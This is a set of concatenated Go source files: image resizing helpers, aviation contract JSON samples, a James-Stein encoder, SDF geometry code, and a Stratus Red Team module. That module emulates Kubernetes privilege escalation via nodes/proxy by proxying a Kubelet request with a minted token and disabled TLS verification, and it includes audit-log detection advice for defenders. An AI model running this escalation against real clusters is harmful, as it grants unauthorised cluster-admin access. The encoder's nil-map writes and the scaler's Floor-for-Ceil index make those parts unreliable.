p2 := (sx - Lf) * (1 - sy + Tf)
p3 := (1 - sx + Lf) * (sy - Tf)
p4 := (sx - Lf) * (sy - Tf)
r := p1*r1f + p2*r2f + p3*r3f + p4*r4f
g := p1*g1f + p2*g2f + p3*g3f + p4*g4f
b := p1*b1f + p2*b2f + p3*b3f + p4*b4f
a := p1*a1f + p2*a2f + p3*a3f + p4*a4f
dst.Set(x, y, color.RGBA64{uint16(r + 0.5), uint16(g + 0.5), uint16(b + 0.5), uint16(a + 0.5)})
}
}
return dst
}
func Scale(src image.Image, zoomx float64, zoomy float64) image.Image {
srcRect := src.Bounds()
srcWidth := srcRect.Dx()
srcHeight := srcRect.Dy()
dstWidth := int(float64(srcWidth) * zoomx)
dstHeight := int(float64(srcHeight) * zoomy)
dstRect := image.Rect(0, 0, dstWidth, dstHeight)
dst := image.NewRGBA(dstRect)
for x := 0; x < dstWidth; x += 1 {
for y := 0; y < dstHeight; y += 1 {
// 反向映射
sx := float64(x) / zoomx
sy := float64(y) / zoomy
Lf, Rf, Tf, Bf := math.Floor(sx), math.Ceil(sx), math.Floor(sy), math.Floor(sy)
Li, Ri, Ti, Bi := int(Lf), int(Rf), int(Tf), int(Bf)
r1, g1, b1, a1 := src.At(Li, Ti).RGBA()
r2, g2, b2, a2 := src.At(Ri, Ti).RGBA()
r3, g3, b3, a3 := src.At(Li, Bi).RGBA()
r4, g4, b4, a4 := src.At(Ri, Bi).RGBA()
r1f, g1f, b1f, a1f := float64(r1), float64(g1), float64(b1), float64(a1)
r2f, g2f, b2f, a2f := float64(r2), float64(g2), float64(b2), float64(a2)
r3f, g3f, b3f, a3f := float64(r3), float64(g3), float64(b3), float64(a3)
r4f, g4f, b4f, a4f := float64(r4), float64(g4), float64(b4), float64(a4)
p1 := (1 - sx + Lf) * (1 - sy + Tf)
p2 := (sx - Lf) * (1 - sy + Tf)
p3 := (1 - sx + Lf) * (sy - Tf)
p4 := (sx - Lf) * (sy - Tf)
r := p1*r1f + p2*r2f + p3*r3f + p4*r4f
g := p1*g1f + p2*g2f + p3*g3f + p4*g4f
b := p1*b1f + p2*b2f + p3*b3f + p4*b4f
a := p1*a1f + p2*a2f + p3*a3f + p4*a4f
dst.Set(x, y, color.RGBA64{uint16(r + 0.5), uint16(g + 0.5), uint16(b + 0.5), uint16(a + 0.5)})
}
}
return dst
}
func Resize(src image.Image, dstWidth int, dstHeight int) image.Image {
srcRect := src.Bounds()
srcWidth := srcRect.Dx()
srcHeight := srcRect.Dy()
dstRect := image.Rect(0, 0, dstWidth, dstHeight)
dst := image.NewRGBA(dstRect)
zoomx := float64(dstWidth) / float64(srcWidth)
zoomy := float64(dstHeight) / float64(srcHeight)
for x := 0; x < dstWidth; x += 1 {
for y := 0; y < dstHeight; y += 1 {
// 反向映射
sx := float64(x) / zoomx
sy := float64(y) / zoomy
Lf, Rf, Tf, Bf := math.Floor(sx), math.Ceil(sx), math.Floor(sy), math.Floor(sy)
Li, Ri, Ti, Bi := int(Lf), int(Rf), int(Tf), int(Bf)
r1, g1, b1, a1 := src.At(Li, Ti).RGBA()
r2, g2, b2, a2 := src.At(Ri, Ti).RGBA()
r3, g3, b3, a3 := src.At(Li, Bi).RGBA()
r4, g4, b4, a4 := src.At(Ri, Bi).RGBA()
r1f, g1f, b1f, a1f := float64(r1), float64(g1), float64(b1), float64(a1)
r2f, g2f, b2f, a2f := float64(r2), float64(g2), float64(b2), float64(a2)
r3f, g3f, b3f, a3f := float64(r3), float64(g3), float64(b3), float64(a3)
r4f, g4f, b4f, a4f := float64(r4), float64(g4), float64(b4), float64(a4)
p1 := (1 - sx + Lf) * (1 - sy + Tf)
p2 := (sx - Lf) * (1 - sy + Tf)
p3 := (1 - sx + Lf) * (sy - Tf)
p4 := (sx - Lf) * (sy - Tf)
r := p1*r1f + p2*r2f + p3*r3f + p4*r4f
g := p1*g1f + p2*g2f + p3*g3f + p4*g4f
b := p1*b1f + p2*b2f + p3*b3f + p4*b4f
a := p1*a1f + p2*a2f + p3*a3f + p4*a4f
dst.Set(x, y, color.RGBA64{uint16(r + 0.5), uint16(g + 0.5), uint16(b + 0.5), uint16(a + 0.5)})
}
}
return dst
}
func Cut(src image.Image, rect image.Rectangle) image.Image {
dstWidth := rect.Dx()
dstHeight := rect.Dy()
dstRect := image.Rect(0, 0, dstWidth, dstHeight)
dst := image.NewRGBA(dstRect)
for x := 0; x < dstWidth; x += 1 {
for y := 0; y < dstHeight; y += 1 {
dst.Set(x, y, src.At(x+rect.Min.X, y+rect.Min.Y))
}
}
return dst
}
func FlipX(src image.Image) image.Image {
rect := src.Bounds()
width := rect.Dx()
height := rect.Dy()
dst := image.NewRGBA(rect)
for x := 0; x < width; x += 1 {
for y := 0; y < height; y += 1 {
dst.Set(x, y, src.At(width-x-1, y))
}
}
return dst
}
func FlipY(src image.Image) image.Image {
rect := src.Bounds()
width := rect.Dx()
height := rect.Dy()
dst := image.NewRGBA(rect)
for x := 0; x < width; x += 1 {
for y := 0; y < height; y += 1 {
dst.Set(x, y, src.At(x, height-y-1))
}
}
return dst
}
func RemoveLine(src image.Image, top, right, bottom, left int) image.Image {
return Cut(src, image.Rect(left, top, src.Bounds().Dx()-right, src.Bounds().Dy()-bottom))
} | base.go | 0.59408 | 0.648807 | base.go | starcoder |
package main
var samples = `
{
"aircraftEvent": {
"aircraft": {
"airline": "AssetID of airline that owns this airplane",
"code": "Aircraft code -- e.g. WN / SWA",
"dateOfBuild": "Aircraft build completed / in service date",
"mode-s": "Aircraft transponder response -- e.g. A68E4A",
"model": "Aircraft model -- e.g. 737-5H4",
"operator": "AssetID of operator that flies this airplane",
"serialNumber": "Aircraft serial number (manufacturer assigned)",
"tailNumber": "Aircraft tail number (airline assigned)",
"variant": "Aircraft model variant -- e.g. B735"
},
"common": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.57831513Z"
}
},
"airlineEvent": {
"airline": {
"code": "The airline 3 letter code.",
"name": "The name of the airline."
},
"common": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.578237395Z"
}
},
"analyticAdjustmentEvent": {
"analyticAdjustment": {
"action": "adjustLifeLimit",
"amount": 123.456,
"assembly": "Assembly serial number",
"reason": "carpe noctem"
}
},
"assemblyEvent": {
"assembly": {
"arlsZone": "tbd",
"ataCode": "The ATA code defining the assembly type, e.g. 32=landing gear, 32-50=steering.",
"lifeLimitInitial": 789,
"name": "The assembly name.",
"serialNumber": "Assembly identifier assigned by manufacturer"
},
"common": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.578334201Z"
}
},
"flightEvent": {
"flight": {
"aircraft": "Aircraft tail or serial number (tbd)",
"analyticHardlanding": true,
"atd": "actual time departure",
"flightnumber": "A flight number",
"from": "3 letter code of originating airport",
"gForce": 123.456,
"hardlanding": true,
"landingType": "code defining landing quality??",
"sta": "standard time arrival",
"std": "standard time departure",
"to": "3 letter code of terminating airport"
}
},
"initEvent": {
"nickname": "TRADELANE",
"version": "The ID of a managed asset. The resource focal point for a smart contract."
},
"inspectionEvent": {
"inspection": {
"action": "BCHECK",
"assembly": "assembly serial number"
}
},
"maintenanceEvent": {
"maintenance": {
"action": "install",
"aircraft": "The serial number of the aircraft to / from which the assembly has been installed / uninstalled.",
"assembly": "This assembly's serial number",
"note": "Maintenance note for this action. Overwritten whenever a new note property is inserted into the maintenance sub-event."
}
},
"state": {
"alerts": {
"active": [
"ACHECK",
"BCHECK",
"HARDLANDING"
],
"cleared": [
"ACHECK",
"BCHECK",
"HARDLANDING"
],
"raised": [
"ACHECK",
"BCHECK",
"HARDLANDING"
]
},
"compliant": true,
"iotCommon": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.57837156Z"
},
"lastEvent": {
"arg": {
"iotCommon": {
"assetID": "The ID of a managed asset. The resource focal point for a smart contract.",
"extension": [
{}
],
"location": {
"latitude": 123.456,
"longitude": 123.456
},
"references": [
"<NAME>"
],
"timestamp": "2016-10-05T05:35:44.578383473Z"
},
"oneOf": {
"aircraft": {
"description": "The aircraft CRUD event",
"properties": {
"aircraft": {
"description": "Writable properties for an aircraft. Note that assetID is the aircraft serial number.",
"properties": {
"airline": {
"description": "AssetID of airline that owns this airplane",
"type": "string"
},
"code": {
"description": "Aircraft code -- e.g. WN / SWA",
"type": "string"
},
"dateOfBuild": {
"description": "Aircraft build completed / in service date",
"type": "string"
},
"mode-s": {
"description": "Aircraft transponder response -- e.g. A68E4A",
"type": "string"
},
"model": {
"description": "Aircraft model -- e.g. 737-5H4",
"type": "string"
},
"operator": {
"description": "AssetID of operator that flies this airplane",
"type": "string"
},
"serialNumber": {
"description": "Aircraft serial number (manufacturer assigned)",
"type": "string"
},
"tailNumber": {
"description": "Aircraft tail number (airline assigned)",
"type": "string"
},
"variant": {
"description": "Aircraft model variant -- e.g. B735",
"type": "string"
}
},
"type": "object"
},
"common": {
"description": "The set of common properties for any event to a contract that adheres to the IoT contract pattern 'partial state as event' for assets and that may have pure events that are *about* these assets.",
"properties": {
"assetID": {
"description": "The ID of a managed asset. The resource focal point for a smart contract.",
"type": "string"
},
"extension": {
"description": "Application managed array of extension properties. Opaque to contract. To be used in emergencies or for sidecar information that is not relevant to contract rule processing.",
"items": {
"properties": {},
"type": "object"
},
"minItems": 0,
"type": "array"
},
"location": {
"description": "A geographical coordinate",
"properties": {
"latitude": {
"type": "number"
},
"longitude": {
"type": "number"
}
},
"type": "object"
},
"references": {
"description": "An array of external references relevant to this asset.",
"items": {
"type": "string"
},
"minItems": 0,
"type": "array"
},
"timestamp": {
"description": "Optional device timestamp. Note that the contract retains the blockchain-assigned transaction UUID and timestamp, which reflect the time that the event arrived at the Hyperledger fabric. The device timestamp has meaning that is relevant to the device, asset and application context.",
"type": "string"
}
},
"required": [
"assetID"
],
"type": "object"
}
},
"type": "object"
},
"airline": {
"description": "The airline CRUD event",
"properties": {
"airline": {
"description": "The writable properties for an airline",
"properties": {
"code": {
"description": "The airline 3 letter code.",
"type": "string"
},
"name": {
"description": "The name of the airline.",
"type": "string"
}
},
"type": "object"
},
"common": {
"description": "The set of common properties for any event to a contract that adheres to the IoT contract pattern 'partial state as event' for assets and that may have pure events that are *about* these assets.",
"properties": {
"assetID": {
"description": "The ID of a managed asset. The resource focal point for a smart contract.",
"type": "string"
},
"extension": {
"description": "Application managed array of extension properties. Opaque to contract. To be used in emergencies or for sidecar information that is not relevant to contract rule processing.",
"items": {
"properties": {},
"type": "object"
},
"minItems": 0,
"type": "array"
},
"location": {
"description": "A geographical coordinate",
"properties": {
"latitude": {
"type": "number"
},
"longitude": {
"type": "number"
}
},
"type": "object"
},
"references": {
"description": "An array of external references relevant to this asset.",
"items": {
"type": "string"
},
"minItems": 0,
"type": "array"
},
"timestamp": {
"description": "Optional device timestamp. Note that the contract retains the blockchain-assigned transaction UUID and timestamp, which reflect the time that the event arrived at the Hyperledger fabric. The device timestamp has meaning that is relevant to the device, asset and application context.",
"type": "string"
}
},
"required": [
"assetID"
],
"type": "object"
}
},
"type": "object"
},
"analyticAdjustment": {
"description": "analytic adjustment event, assetid defines the assembly receiving the adjustment",
"properties": {
"analyticAdjustment": {
"description": "An adjustment based on analytical analysis to the assembly's cycle counters, which translates to changes to life limit *used*. Positive number indicates that the assembly has used more of its life, negative number indicates that the assembly has been granted a bit more life based on conditions such as weather, landing gForces, runway roughness and so on.",
"properties": {
"action": {
"enum": [
"adjustLifeLimit"
],
"type": "string"
},
"amount": {
"type": "number"
},
"assembly": {
"description": "Assembly serial number",
"type": "string"
},
"reason": {
"type": "string"
}
},
"type": "object"
}
},
"type": "object"
},
"assembly": {
"description": "The assembly event. Note that assetID is the assembly serial number",
"properties": {
"assembly": {
"description": "The set of writable properties that define an assembly. Note that assetID is the assembly serial number",
"properties": {
"arlsZone": {
"description": "tbd",
"type": "string"
},
"ataCode": {
"description": "The ATA code defining the assembly type, e.g. 32=landing gear, 32-50=steering.",
"type": "string"
},
"lifeLimitInitial": {
"description": "Initial assembly life limit.",
"type": "integer"
},
"name": {
"description": "The assembly name.",
"type": "string"
},
"serialNumber": {
"description": "Assembly identifier assigned by manufacturer",
"type": "string"
}
},
"required": [
"serialNumber",
"ataCode",
"name"
],
"type": "object"
},
"common": {
"description": "The set of common properties for any event to a contract that adheres to the IoT contract pattern 'partial state as event' for assets and that may have pure events that are *about* these assets.",
"properties": {
"assetID": {
"description": "The ID of a managed asset. The resource focal point for a smart contract.",
"type": "string"
},
"extension": {
"description": "Application managed array of extension properties. Opaque to contract. To be used in emergencies or for sidecar information that is not relevant to contract rule processing.",
"items": {
"properties": {},
"type": "object"
},
"minItems": 0,
"type": "array"
},
"location": {
"description": "A geographical coordinate",
"properties": {
"latitude": {
"type": "number"
},
"longitude": {
"type": "number"
}
},
"type": "object"
},
"references": {
"description": "An array of external references relevant to this asset.",
"items": {
"type": "string"
},
"minItems": 0,
"type": "array"
},
"timestamp": {
"description": "Optional device timestamp. Note that the contract retains the blockchain-assigned transaction UUID and timestamp, which reflect the time that the event arrived at the Hyperledger fabric. The device timestamp has meaning that is relevant to the device, asset and application context.",
"type": "string"
}
},
"required": [
"assetID"
],
"type": "object"
}
},
"type": "object"
},
"flight": {
"description": "flight event, assetID defines airplane against which the event occurred",
"properties": {
"flight": {
"description": "A takeoiff and a landing",
"properties": {
"aircraft": {
"description": "Aircraft tail or serial number (tbd)",
"type": "string"
},
"analyticHardlanding": {
"description": "landing considered hard by analytics",
"type": "boolean"
},
"atd": {
"description": "actual time departure",
"type": "string"
},
"flightnumber": {
"description": "A flight number",
"type": "string"
},
"from": {
"description": "3 letter code of originating airport",
"type": "string"
},
"gForce": {
"description": "force incurred on landing",
"type": "number"
},
"hardlanding": {
"description": "landing considered hard by pilot or aircraft sensor",
"type": "boolean"
},
"landingType": {
"description": "code defining landing quality??",
"type": "string"
},
"sta": {
"description": "standard time arrival",
"type": "string"
},
"std": {
"description": "standard time departure",
"type": "string"
},
"to": {
"description": "3 letter code of terminating airport",
"type": "string"
}
},
"type": "object"
}
},
"type": "object"
},
"inspection": {
"description": "An inspection has been performed against a specific assembly. Will clear one or more alerts and reset their counters.",
"properties": {
"inspection": {
"description": "indicates that an inspection has occured for this assembly",
"properties": {
"action": {
"description": "inspection that has been performed",
"enum": [
"ACHECK",
"BCHECK",
"HARDLANDING"
],
"type": "string"
},
"assembly": {
"description": "assembly serial number",
"type": "string"
}
},
"type": "object"
}
},
"type": "object"
},
"maintenance": {
"description": "maintenance event",
"properties": {
"maintenance": {
"description": "Maintenance consists of installation of an assembly onto an aircraft or uninstallation of same. When an assembly is not installed on an aircraft, it is said to be in inventory or in maintenance. Thus, there is a status on assemblies showing that.",
"properties": {
"action": {
"enum": [
"commission",
"install",
"uninstall",
"startMaintenance",
"endMaintenance",
"scrap"
],
"type": "string"
},
"aircraft": {
"description": "The serial number of the aircraft to / from which the assembly has been installed / uninstalled.",
"type": "string"
},
"assembly": {
"description": "This assembly's serial number",
"type": "string"
},
"note": {
"description": "Maintenance note for this action. Overwritten whenever a new note property is inserted into the maintenance sub-event.",
"type": "string"
}
},
"required": [
"assembly",
"action"
],
"type": "object"
}
},
"type": "object"
}
}
},
"function": "function that created this state object",
"redirectedFromFunction": "function that originally received the event"
},
"oneOf": {
"aircraft": {
"description": "Writable properties for an aircraft. Note that assetID is the aircraft serial number.",
"properties": {
"airline": {
"description": "AssetID of airline that owns this airplane",
"type": "string"
},
"code": {
"description": "Aircraft code -- e.g. WN / SWA",
"type": "string"
},
"dateOfBuild": {
"description": "Aircraft build completed / in service date",
"type": "string"
},
"mode-s": {
"description": "Aircraft transponder response -- e.g. A68E4A",
"type": "string"
},
"model": {
"description": "Aircraft model -- e.g. 737-5H4",
"type": "string"
},
"operator": {
"description": "AssetID of operator that flies this airplane",
"type": "string"
},
"serialNumber": {
"description": "Aircraft serial number (manufacturer assigned)",
"type": "string"
},
"tailNumber": {
"description": "Aircraft tail number (airline assigned)",
"type": "string"
},
"variant": {
"description": "Aircraft model variant -- e.g. B735",
"type": "string"
}
},
"type": "object"
},
"airline": {
"description": "The writable properties for an airline",
"properties": {
"code": {
"description": "The airline 3 letter code.",
"type": "string"
},
"name": {
"description": "The name of the airline.",
"type": "string"
}
},
"type": "object"
},
"assembly": {
"description": "The set of writable properties that define an assembly. Note that assetID is the assembly serial number",
"properties": {
"arlsZone": {
"description": "tbd",
"type": "string"
},
"ataCode": {
"description": "The ATA code defining the assembly type, e.g. 32=landing gear, 32-50=steering.",
"type": "string"
},
"lifeLimitInitial": {
"description": "Initial assembly life limit.",
"type": "integer"
},
"name": {
"description": "The assembly name.",
"type": "string"
},
"serialNumber": {
"description": "Assembly identifier assigned by manufacturer",
"type": "string"
}
},
"required": [
"serialNumber",
"ataCode",
"name"
],
"type": "object"
}
},
"txntimestamp": "Transaction timestamp matching that in the blockchain.",
"txnuuid": "Transaction UUID matching that in the blockchain."
},
"stateFilter": {
"entries": [
{
"qprop": "A qualified property as dot separated levels terminated by a leaf node. An example would be 'common.assetID'.",
"value": "The value to be compared."
}
],
"matchmode": "matchany"
}
}` | contracts/industry/aviation_sample_contract/samples.go | 0.759761 | 0.542257 | samples.go | starcoder |
package encoder
import (
"github.com/humilityai/sam"
)
// JamesSteinRegression is a one way encoder.
// You cannot decode JamesSteinRegression values
// as some values may be encoded with the same
// numerical code.
// JamesSteinRegression is a target-based encoder.
type JamesSteinRegression struct {
encoder map[string]float64
}
// JamesSteinClassification is a one way encoder.
// You cannot decode JamesSteinClassification values
// as some values may be encoded with the same
// numerical code.
// JamesSteinClassification is a target-based encoder.
type JamesSteinClassification struct {
encodedValues sam.SliceFloat64
}
// NewJamesSteinRegression will create a JamesSteinRegression encoder
func NewJamesSteinRegression(values []string, target []float64) (*JamesSteinRegression, error) {
if len(target) != len(values) {
return &JamesSteinRegression{}, ErrTargetLength
}
targetValues := make(map[string]sam.SliceFloat64)
for i := 0; i < len(values); i++ {
targetValues[values[i]] = append(targetValues[values[i]], target[i])
}
encoder := make(map[string]float64)
for k, v := range targetValues {
encoder[k] = v.Avg()
}
return &JamesSteinRegression{
encoder: encoder,
}, nil
}
// NewJamesSteinClassification will create a JamesSteinClassification encoder
func NewJamesSteinClassification(values []string, target []string) (*JamesSteinClassification, error) {
if len(target) != len(values) {
return &JamesSteinClassification{}, ErrTargetLength
}
groupCounts := make(sam.MapStringInt)
classCounts := make(sam.MapStringInt)
groupClassCounts := make(map[string]sam.MapStringInt)
for i := 0; i < len(values); i++ {
group := values[i]
class := target[i]
groupCounts.Increment(group)
classCounts.Increment(class)
groupClassCounts[group].Increment(class)
}
groupClassBValues := make(map[string]map[string]float64)
for group, classCounts := range groupClassCounts {
groupCount := groupCounts[group]
for class, count := range classCounts {
classCount := classCounts[class]
groupClassPercentage := float64(count) / float64(classCount)
classPercentage := float64(classCount) / float64(len(target))
groupClassValue := (groupClassPercentage * (1 - groupClassPercentage)) / float64(groupCount)
classValue := (classPercentage * (1 - classPercentage)) / float64(len(target))
groupClassBValues[group][class] = groupClassValue / (groupClassValue + classValue)
}
}
encodedValues := make(sam.SliceFloat64, len(target), len(target))
for i := 0; i < len(values); i++ {
group := values[i]
class := target[i]
encodedValues[i] = groupClassBValues[group][class]
}
return &JamesSteinClassification{
encodedValues: encodedValues,
}, nil
}
// Get will retrieve the code for the given categorical value.
func (e *JamesSteinRegression) Get(s string) (float64, bool) {
v, ok := e.encoder[s]
return v, ok
}
// Codes will return the slice of codes for all of the values
// used in the construction of the JamesSteinClassification encoder.
func (e *JamesSteinClassification) Codes() sam.SliceFloat64 {
return e.encodedValues
}
// Get will retrieve the code for the given categorical value.
func (e *JamesSteinClassification) Get(index int) (float64, error) {
if index < 0 || index > len(e.encodedValues)-1 {
return 0, ErrBounds
}
return e.encodedValues[index], nil
} | james-stein.go | 0.655226 | 0.513546 | james-stein.go | starcoder |
package kubernetes
import (
"context"
"crypto/tls"
_ "embed"
"errors"
"fmt"
"github.com/datadog/stratus-red-team/internal/providers"
"github.com/datadog/stratus-red-team/pkg/stratus"
"github.com/datadog/stratus-red-team/pkg/stratus/mitreattack"
"io"
authenticationv1 "k8s.io/api/authentication/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
"log"
"net/http"
"strconv"
)
//go:embed main.tf
var tf []byte
func init() {
const codeBlock = "```"
const code = "`"
stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
ID: "k8s.privilege-escalation.nodes-proxy",
FriendlyName: "Privilege escalation through node/proxy permissions",
Platform: stratus.Kubernetes,
IsIdempotent: true,
MitreAttackTactics: []mitreattack.Tactic{mitreattack.PrivilegeEscalation},
Description: `
Uses the node proxy API to proxy a Kubelet request through a worker node. This is a vector of privilege escalation, allowing
any principal with the ` + code + `nodes/proxy` + code + ` permission to escalate their privilege to cluster administrator,
bypassing at the same time admission control checks and logging of the API server.
Warm-up:
- Create a namespace
- Create a service account in this namespace
- Create a cluster role with ` + code + `nodes/proxy` + code + ` permissions
- Bind the cluster role to the service account
Detonation:
- Retrieve a token for the service account with ` + code + `nodes/proxy` + code + ` permissions creating during warm-up
- Use the node proxy API to proxy a benign request to the Kubelet through the worker node
References:
- https://blog.aquasec.com/privilege-escalation-kubernetes-rbac
- https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.22/#-strong-proxy-operations-node-v1-core-strong-
`,
Detection: `
Using Kubernetes API server audit logs, you can identify when the nodes proxy API is used.
Sample event (shortened):
` + codeBlock + `json hl_lines="3 4"
{
"objectRef": {
"resource": "nodes",
"subresource": "proxy",
"name": "ip-192-168-34-255.eu-west-1.compute.internal",
"apiVersion": "v1"
},
"http": {
"url_details": {
"path": "/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods/"
},
"method": "get",
"status_code": 200,
"status_category": "OK"
},
"kind": "Event",
"level": "Request",
"requestURI": "/api/v1/nodes/ip-192-168-34-255.eu-west-1.compute.internal/proxy/runningpods/",
}
` + codeBlock + `
Under normal operating conditions, it's not expected that this API is used frequently.
Consequently, alerting on ` + code + `objectRef.resource == "nodes" && objectRef.subresource == "proxy"` + code + ` should yield minimal false positives.
Additionally, looking at the Kubelet API path that was proxied can help identify malicious activity (/runningpods in this example).
See [kubeletctl](https://github.com/cyberark/kubeletctl/blob/master/pkg/api/constants.go) for an unofficial list of Kubelet API endpoints.
`,
PrerequisitesTerraformCode: tf,
Detonate: detonate,
})
}
func detonate(params map[string]string) error {
client := providers.K8s().GetClient()
serviceAccountName := params["service_account_name"]
serviceAccountNamespace := params["service_account_namespace"]
// Step 1: Get a service account token for our service account, which has "nodes/proxy" permissions
log.Println("Retrieving service account token for service account " + serviceAccountName)
authenticationToken, err := getServiceAccountToken(serviceAccountName, serviceAccountNamespace, client)
if err != nil {
return err
}
// Step 2: Choose a node to proxy from
node, err := getRandomNodeName(client)
if err != nil {
return err
}
// Step 3: Proxy the request to the Kubelet through this node
log.Println("Using worker node '" + node + "' to proxy to the Kubelet API")
_, err = proxyKubeletRequest("/runningpods/", authenticationToken, node, client)
if err != nil {
return err
}
log.Println("Successfully proxied a benign Kubelet API request through the worker node")
return nil
}
// Generates a service account token for a specific service account
func getServiceAccountToken(serviceAccount string, namespace string, client *kubernetes.Clientset) (string, error) {
tokenRequest := &authenticationv1.TokenRequest{}
options := metav1.CreateOptions{}
result, err := client.CoreV1().ServiceAccounts(namespace).CreateToken(context.Background(), serviceAccount, tokenRequest, options)
if err != nil {
return "", errors.New("unable to retrieve service account token for " + serviceAccount + ": " + err.Error())
}
return result.Status.Token, nil
}
// Returns the name of a worker node, no matter which one
func getRandomNodeName(client *kubernetes.Clientset) (string, error) {
result, err := client.CoreV1().Nodes().List(context.Background(), metav1.ListOptions{})
if err != nil {
return "", errors.New("unable to list worker nodes: " + err.Error())
}
return result.Items[0].ObjectMeta.Name, nil
}
// Uses the nodes proxy API to proxy a request through a node to hit the Kubelet
// see https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.22/#-strong-proxy-operations-node-v1-core-strong-
func proxyKubeletRequest(kubeletApiPath string, token string, node string, client *kubernetes.Clientset) (string, error) {
// Note: We have to use a raw HTTP request because it's not straightforward to create a new K8s API client from
// a static bearer token
config := providers.K8s().GetRestConfig()
httpClient := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
}
apiServerUrl := fmt.Sprintf("%s/%s", config.Host, config.APIPath)
endpointUrl := fmt.Sprintf("%sapi/v1/nodes/%s/proxy%s", apiServerUrl, node, kubeletApiPath)
req, _ := http.NewRequest("GET", endpointUrl, nil)
req.Header.Set("Authorization", "Bearer "+token)
req.Header.Set("User-Agent", providers.StratusUserAgent)
log.Println("Performing request to " + endpointUrl)
response, err := httpClient.Do(req)
if err != nil {
return "", errors.New("unable to proxy to the Kubelet API: " + err.Error())
}
rawBody, err := io.ReadAll(response.Body)
if err != nil {
return "", errors.New("unable to read Kubelet response body: " + err.Error())
}
body := string(rawBody)
if statusCode := response.StatusCode; statusCode != 200 {
return "", errors.New("got non-200 status code from the proxying API: " + strconv.Itoa(statusCode) + "\nresponse body: " + body)
}
return body, nil
} | internal/attacktechniques/k8s/privilege-escalation/nodes-proxy/main.go | 0.759404 | 0.503235 | main.go | starcoder |
package spt
// http://iquilezles.org/www/articles/distfunctions/distfunctions.htm
import (
"encoding/gob"
"math"
)
func init() {
gob.Register(SDFExtrude{})
gob.Register(SDFRevolve{})
gob.Register(SDFSphere{})
gob.Register(SDFCube{})
gob.Register(SDFTorus{})
gob.Register(SDFCone{})
gob.Register(SDFRounded{})
gob.Register(SDFHollow{})
gob.Register(SDFElongate{})
gob.Register(SDFRepeat{})
gob.Register(SDFEllipsoid{})
}
type SDF3 interface {
SDF() func(Vec3) float64
Sphere() (Vec3, float64)
}
func SDF3Normal(sdf func(Vec3) float64, p Vec3) Vec3 {
step := 0.000001
gradient := Vec3{
sdf(Vec3{p.X + step, p.Y, p.Z}) - sdf(Vec3{p.X - step, p.Y, p.Z}),
sdf(Vec3{p.X, p.Y + step, p.Z}) - sdf(Vec3{p.X, p.Y - step, p.Z}),
sdf(Vec3{p.X, p.Y, p.Z + step}) - sdf(Vec3{p.X, p.Y, p.Z - step}),
}
return gradient.Unit()
}
type SDFExtrude struct {
H float64
SDF2
}
func (s SDFExtrude) SDF() func(Vec3) float64 {
sdf := s.SDF2.SDF()
return func(pos Vec3) float64 {
d := sdf(V2(pos.X, pos.Y))
w := V2(d, abs(pos.Z)-s.H)
return min(max(w.X, w.Y), 0.0) + len2(max2(w, Zero2))
}
}
func (s SDFExtrude) Sphere() (Vec3, float64) {
center, radius := s.SDF2.Circle()
return Zero3.Add(V3(center.X, center.Y, 0)), sqrt(radius*radius + s.H*s.H)
}
func Extrude(h float64, sdf SDF2) SDF3 {
return SDFExtrude{h / 2, sdf}
}
type SDFRevolve struct {
O float64
SDF2
}
func (s SDFRevolve) SDF() func(Vec3) float64 {
sdf := s.SDF2.SDF()
return func(pos Vec3) float64 {
return sdf(V2(len2(V2(pos.X, pos.Z))-s.O, pos.Y))
}
}
func (s SDFRevolve) Sphere() (Vec3, float64) {
center, radius := s.SDF2.Circle()
return Zero3.Add(V3(center.X, center.Y, 0)), radius
}
func Revolve(o float64, sdf SDF2) SDF3 {
return SDFRevolve{o, sdf}
}
type SDFSphere struct {
R float64
}
func (s SDFSphere) SDF() func(Vec3) float64 {
return func(pos Vec3) float64 {
return len3(pos) - s.R
}
}
func (s SDFSphere) Sphere() (Vec3, float64) {
return Zero3, s.R
}
func Sphere(r float64) SDF3 {
return SDFSphere{r}
}
type SDFCube struct {
X, Y, Z float64
}
func (s SDFCube) SDF() func(Vec3) float64 {
box := V3(s.X, s.Y, s.Z)
return func(pos Vec3) float64 {
q := sub3(abs3(pos), box)
return len3(max3(q, Zero3)) + min(max(q.X, max(q.Y, q.Z)), 0.0)
}
}
func (s SDFCube) Sphere() (Vec3, float64) {
return Zero3, len3(V3(s.X, s.Y, s.Z))
}
func Cube(x, y, z float64) SDF3 {
return SDFCube{x / 2, y / 2, z / 2}
}
func CubeR(x, y, z, r float64) SDF3 {
d := r * 2
return Round(r, Cube(x-d, y-d, z-d))
}
func Cylinder(h, r float64) SDF3 {
return Extrude(h, Circle(r))
}
func CylinderR(h, r, ro float64) SDF3 {
return Round(ro, Cylinder(h-ro*2, r-ro))
}
func Capsule(h, r1, r2 float64) SDF3 {
return TranslateZ(-r2, RotateX(-90, Revolve(0, Stadium(h, r1, r2))))
}
type SDFTorus struct {
V Vec2
}
func (s SDFTorus) SDF() func(Vec3) float64 {
return func(pos Vec3) float64 {
q := V2(len2(V2(pos.X, pos.Z))-s.V.X, pos.Y)
return len2(q) - s.V.Y
}
}
func (s SDFTorus) Sphere() (Vec3, float64) {
return Zero3, s.V.X + s.V.Y
}
func Torus(x, y float64) SDF3 {
w := x - y
return SDFTorus{Vec2{x - w/2, w / 2}}
}
type SDFCone struct {
X, Y, H, R float64
}
func (s SDFCone) SDF() func(Vec3) float64 {
return func(pos Vec3) float64 {
